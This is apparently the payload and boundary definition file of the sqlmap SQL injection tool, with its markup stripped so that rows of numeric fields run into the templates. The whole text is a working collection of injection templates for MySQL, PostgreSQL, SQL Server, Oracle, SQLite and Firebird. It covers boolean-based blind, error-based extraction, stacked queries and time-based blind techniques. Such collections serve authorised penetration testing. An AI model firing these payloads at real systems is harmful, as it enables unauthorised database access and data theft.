1 0 1,2,3 1 1 1 1,2 1 ) AND ([RANDNUM]=[RANDNUM] 2 1 1,2 1 )) AND (([RANDNUM]=[RANDNUM] 3 1 1,2 1 ))) AND ((([RANDNUM]=[RANDNUM] 1 1 1,2 2 ' AND '[RANDSTR]'='[RANDSTR] 1 1 1,2 2 ') AND ('[RANDSTR]'='[RANDSTR] 2 1 1,2 2 ')) AND (('[RANDSTR]'='[RANDSTR] 3 1 1,2 2 '))) AND ((('[RANDSTR]'='[RANDSTR] 2 1 1,2 3 ' AND '[RANDSTR]' LIKE '[RANDSTR] 2 1 1,2 3 ') AND ('[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 3 ')) AND (('[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 3 '))) AND ((('[RANDSTR]' LIKE '[RANDSTR] 2 1 1,2 4 " AND "[RANDSTR]"="[RANDSTR] 3 1 1,2 4 ") AND ("[RANDSTR]"="[RANDSTR] 4 1 1,2 4 ")) AND (("[RANDSTR]"="[RANDSTR] 4 1 1,2 4 "))) AND ((("[RANDSTR]"="[RANDSTR] 3 1 1,2 5 " AND "[RANDSTR]" LIKE "[RANDSTR] 4 1 1,2 5 ") AND ("[RANDSTR]" LIKE "[RANDSTR] 5 1 1,2 5 ")) AND (("[RANDSTR]" LIKE "[RANDSTR] 5 1 1,2 5 "))) AND ((("[RANDSTR]" LIKE "[RANDSTR] AND boolean-based blind - WHERE clause 1 1 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE clause (MySQL comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE clause (Generic comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] -- AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE clause 1 2 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE clause (MySQL comment) 1 3 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]
MySQL
OR boolean-based blind - WHERE clause (Generic comment) 1 3 3 1 2 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] -- OR NOT [RANDNUM]=[RANDNUM1] Generic boolean-based blind - Parameter replace 1 2 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) MySQL >= 5.0 boolean-based blind - Parameter replace 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - Parameter replace 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server
Oracle boolean-based blind - Parameter replace 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle
Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END)) MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 2,3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server
Oracle boolean-based blind - ORDER BY clause 1 3 1 3 1 , (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL) , (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)
Oracle
MySQL >= 5.0 error-based - WHERE clause (AND) 2 1 0 1 1 AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - WHERE clause (AND) 2 1 0 1 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - WHERE clause (AND) 2 1 0 1 1 AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server
Oracle error-based - WHERE clause (AND) 2 1 0 1 1 AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird error-based - WHERE clause (AND) 2 2 0 1 1 AND [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - WHERE clause (OR) 2 2 2 1 2 OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - WHERE clause (OR) 2 2 2 1 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC) OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - WHERE clause (OR) 2 2 2 1 2 OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')) OR [RANDNUM]=CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server
Oracle error-based - WHERE clause (OR) 2 2 2 1 2 OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird error-based - WHERE clause (OR) 2 3 2 1 2 OR [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - Parameter replace 2 3 0 1,2,3 3 (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - Parameter replace 2 3 0 1,2,3 3 (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - Parameter replace 2 3 0 1,3 3 (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server
Oracle error-based - Parameter replace 2 3 0 1,3 3 (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird error-based - Parameter replace 2 4 0 1,3 3 (SELECT [RANDNUM]=('[DELIMITER_START]'||(%s)||'[DELIMITER_STOP]')) (SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) , (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
PostgreSQL error-based - GROUP BY and ORDER BY clauses 2 3 0 2,3 1 , (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC)) , (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase error-based - ORDER BY clause 2 3 0 3 1 , (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]'))) , (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server
Oracle error-based - ORDER BY clause 2 3 0 3 1 , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) , (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
MySQL > 5.0.11 stacked queries 4 1 0 0 1 ; SELECT SLEEP([SLEEPTIME]); --
MySQL > 5.0.11
MySQL < 5.0.12 stacked queries 4 2 0 0 1 ; SELECT BENCHMARK(5000000, MD5('[SLEEPTIME]')); --
MySQL
PostgreSQL > 8.1 stacked queries 4 1 0 0 1 ; SELECT PG_SLEEP([SLEEPTIME]); --
PostgreSQL > 8.1
PostgreSQL < 8.2 stacked queries - exists function 4 3 0 0 1 ; SELECT 'sqlmap' WHERE exists(SELECT * FROM generate_series(1, 3000000)); --
PostgreSQL < 8.2
PostgreSQL < 8.2 stacked queries - Glibc 4 4 0 0 1 ; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]); --
PostgreSQL < 8.2 Linux
Microsoft SQL Server/Sybase stacked queries 4 1 0 0 1 ; WAITFOR DELAY '0:0:[SLEEPTIME]'; --
Microsoft SQL Server
Oracle stacked queries - BEGIN DBMS_LOCK.SLEEP technique 4 3 0 0 1 ; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END; --
Oracle
Oracle stacked queries - EXEC DBMS_LOCK.SLEEP technique 4 4 0 0 1 ; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00); --
Oracle
Oracle stacked queries - BEGIN USER_LOCK.SLEEP technique 4 5 0 0 1 ; EXEC USER_LOCK.SLEEP([SLEEPTIME].00); --
Oracle
SQLite > 2.0 stacked queries 4 3 0 0 1 ; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000)))); --
SQLite > 2.0
Firebird stacked queries 4 3 0 0 1 ; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6; --
Firebird > 2.0
MySQL > 5.0.11 AND time-based blind 5 1 1 1,2,3 1 AND IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME])) AND SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL < 5.0.12 AND time-based blind 5 2 1 1,2,3 1 AND IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) AND BENCHMARK(5000000, MD5('[SLEEPTIME]'))
MySQL
SQLite > 2.0 AND time-based blind 5 3 1 1 1 AND LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))
SQLite > 2.0
Firebird AND time-based blind 5 4 1 1 1 AND (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0
Firebird > 2.0
MySQL > 5.0.11 OR time-based blind 5 2 3 1,2,3 2 OR IF(([INFERENCE]), [RANDNUM], SLEEP([SLEEPTIME])) OR SLEEP([SLEEPTIME])
MySQL > 5.0.11
MySQL < 5.0.12 OR time-based blind 5 3 3 1,2,3 2 OR IF(([INFERENCE]), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]')) OR BENCHMARK(5000000, MD5('[SLEEPTIME]'))
MySQL
SQLite > 2.0 OR time-based blind 5 4 3 1 1 OR LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB(10000000))))
SQLite > 2.0
Firebird OR time-based blind 5 5 3 1 2 OR (SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6) > 0
Firebird > 2.0